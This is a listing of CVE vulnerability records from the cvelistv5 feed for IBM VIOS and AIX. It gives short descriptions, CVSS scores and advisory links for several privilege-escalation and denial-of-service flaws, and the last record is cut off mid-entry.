All the vulnerabilites related to IBM - VIOS
cve-2010-0960
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://securitytracker.com/id?1023695 | vdb-entry, x_refsource_SECTRACK | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ68231 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ71870 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ71627 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.vupen.com/english/advisories/2010/0557 | vdb-entry, x_refsource_VUPEN | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ71555 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/qosmod_advisory.asc | x_refsource_CONFIRM | |
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6822 | vdb-entry, signature, x_refsource_OVAL |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-07T01:06:52.612Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1023695", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://securitytracker.com/id?1023695" }, { "name": "IZ68231", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ68231" }, { "name": "IZ71870", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71870" }, { "name": "IZ71627", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71627" }, { "name": "ADV-2010-0557", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2010/0557" }, { "name": "IZ71555", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71555" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/qosmod_advisory.asc" }, { "name": "oval:org.mitre.oval:def:6822", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6822" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2010-03-05T00:00:00", "descriptions": [ { "lang": "en", "value": "Buffer overflow in qosmod in bos.net.tcp.server in IBM AIX 6.1 and VIOS 2.1 allows local users to gain privileges via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-18T12:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "1023695", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://securitytracker.com/id?1023695" }, { "name": "IZ68231", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ68231" }, { "name": "IZ71870", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71870" }, { "name": "IZ71627", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71627" }, { "name": "ADV-2010-0557", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2010/0557" }, { "name": "IZ71555", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71555" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/qosmod_advisory.asc" }, { "name": "oval:org.mitre.oval:def:6822", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6822" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2010-0960", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Buffer overflow in qosmod in bos.net.tcp.server in IBM AIX 6.1 and VIOS 2.1 allows local users to gain privileges via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "1023695", "refsource": "SECTRACK", "url": "http://securitytracker.com/id?1023695" }, { "name": "IZ68231", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ68231" }, { "name": "IZ71870", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71870" }, { "name": "IZ71627", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71627" }, { "name": "ADV-2010-0557", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2010/0557" }, { "name": "IZ71555", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71555" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/qosmod_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/qosmod_advisory.asc" }, { "name": "oval:org.mitre.oval:def:6822", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6822" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2010-0960", "datePublished": "2010-03-10T22:00:00", "dateReserved": "2010-03-10T00:00:00", "dateUpdated": "2024-08-07T01:06:52.612Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29862
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6483875 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/206086 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:03.205Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129862-dos (206086)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206086" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2021-08-25T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 206086." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/S:U/A:H/PR:N/AV:L/UI:N/I:N/AC:L/C:N/RL:O/E:U/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-08-26T19:25:29", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129862-dos (206086)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206086" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-08-25T00:00:00", "ID": "CVE-2021-29862", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 206086." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6483875", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6483875 (AIX)", "url": "https://www.ibm.com/support/pages/node/6483875" }, { "name": "ibm-aix-cve202129862-dos (206086)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206086" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29862", "datePublished": "2021-08-26T19:25:29.255953Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-16T18:03:15.846Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45174
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7095022 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267972 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.804Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7095022" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267972" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a privileged local user to exploit a vulnerability in the qdaemon command to escalate privileges or cause a denial of service. IBM X-Force ID: 267972." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a privileged local user to exploit a vulnerability in the qdaemon command to escalate privileges or cause a denial of service. IBM X-Force ID: 267972." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "264 Permissions, Privileges, Access Controls", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-13T23:04:25.351Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7095022" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267972" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX privilege escalation", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45174", "datePublished": "2023-12-13T23:04:25.351Z", "dateReserved": "2023-10-05T01:38:58.205Z", "dateUpdated": "2024-08-02T20:14:19.804Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2012-2192
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id?1027126 | vdb-entry, x_refsource_SECTRACK | |
http://www.ibm.com/support/docview.wss?uid=isg1IV21235 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/socket_advisory.asc | x_refsource_CONFIRM | |
http://www.securityfocus.com/bid/53567 | vdb-entry, x_refsource_BID | |
http://www.ibm.com/support/docview.wss?uid=isg1IV19178 | vendor-advisory, x_refsource_AIXAPAR | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/76032 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=isg1IV21128 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV16603 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV21131 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T19:26:09.175Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1027126", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1027126" }, { "name": "IV21235", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21235" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/socket_advisory.asc" }, { "name": "53567", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/53567" }, { "name": "IV19178", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19178" }, { "name": "aix-socketpair-dos(76032)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/76032" }, { "name": "IV21128", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21128" }, { "name": "IV16603", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV16603" }, { "name": "IV21131", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21131" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-06-05T00:00:00", "descriptions": [ { "lang": "en", "value": "The socketpair function in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.1.4-FP-25 SP-02 allows local users to cause a denial of service (system crash) via a crafted application that leverages the presence of a socket on the free list." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "1027126", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1027126" }, { "name": "IV21235", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21235" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/socket_advisory.asc" }, { "name": "53567", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/53567" }, { "name": "IV19178", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19178" }, { "name": "aix-socketpair-dos(76032)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/76032" }, { "name": "IV21128", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21128" }, { "name": "IV16603", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV16603" }, { "name": "IV21131", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21131" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2012-2192", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The socketpair function in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.1.4-FP-25 SP-02 allows local users to cause a denial of service (system crash) via a crafted application that leverages the presence of a socket on the free list." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "1027126", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1027126" }, { "name": "IV21235", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21235" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/socket_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/socket_advisory.asc" }, { "name": "53567", "refsource": "BID", "url": "http://www.securityfocus.com/bid/53567" }, { "name": "IV19178", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV19178" }, { "name": "aix-socketpair-dos(76032)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/76032" }, { "name": "IV21128", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21128" }, { "name": "IV16603", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV16603" }, { "name": "IV21131", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV21131" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2012-2192", "datePublished": "2012-06-20T10:00:00", "dateReserved": "2012-04-04T00:00:00", "dateUpdated": "2024-08-06T19:26:09.175Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38993
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6559320 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/212962 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:17.573Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6559320" }, { "name": "ibm-aix-cve202138993-dos (212962)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212962" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] } ], "datePublic": "2022-02-24T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the smbcd daemon to cause a denial of service. IBM X-Force ID: 212962." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/S:U/C:N/PR:N/A:H/AC:L/I:N/UI:N/RL:O/E:U/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-02-25T18:00:11", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6559320" }, { "name": "ibm-aix-cve202138993-dos (212962)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212962" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-02-24T00:00:00", "ID": "CVE-2021-38993", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the smbcd daemon to cause a denial of service. IBM X-Force ID: 212962." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6559320", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6559320 (AIX)", "url": "https://www.ibm.com/support/pages/node/6559320" }, { "name": "ibm-aix-cve202138993-dos (212962)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212962" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38993", "datePublished": "2022-02-25T18:00:11.336647Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-17T02:06:22.867Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2012-4817
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id?1027531 | vdb-entry, x_refsource_SECTRACK | |
http://www.ibm.com/support/docview.wss?uid=isg1IV12169 | vendor-advisory, x_refsource_AIXAPAR | |
http://osvdb.org/85427 | vdb-entry, x_refsource_OSVDB | |
http://secunia.com/advisories/50619 | third-party-advisory, x_refsource_SECUNIA | |
http://aix.software.ibm.com/aix/efixes/security/nfsv4_advisory1.asc | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=isg1IV17855 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV10327 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV26436 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.securityfocus.com/bid/55546 | vdb-entry, x_refsource_BID | |
http://www.ibm.com/support/docview.wss?uid=isg1IV11629 | vendor-advisory, x_refsource_AIXAPAR | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/78431 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T20:50:16.877Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1027531", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1027531" }, { "name": "IV12169", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV12169" }, { "name": "85427", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/85427" }, { "name": "50619", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/50619" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/nfsv4_advisory1.asc" }, { "name": "IV17855", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV17855" }, { "name": "IV10327", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV10327" }, { "name": "IV26436", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV26436" }, { "name": "55546", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/55546" }, { "name": "IV11629", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV11629" }, { "name": "aix-nfsv4-gid-dos(78431)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78431" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-09-13T00:00:00", "descriptions": [ { "lang": "en", "value": "The NFSv4 client implementation in IBM AIX 5.3, 6.1, and 7.1, and VIOS before 2.2.1.4-FP-25 SP-02, does not properly handle GID values, which allows remote attackers to cause a denial of service via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "1027531", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1027531" }, { "name": "IV12169", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV12169" }, { "name": "85427", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/85427" }, { "name": "50619", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/50619" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/nfsv4_advisory1.asc" }, { "name": "IV17855", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV17855" }, { "name": "IV10327", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV10327" }, { "name": "IV26436", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV26436" }, { "name": "55546", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/55546" }, { "name": "IV11629", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV11629" }, { "name": "aix-nfsv4-gid-dos(78431)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78431" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": 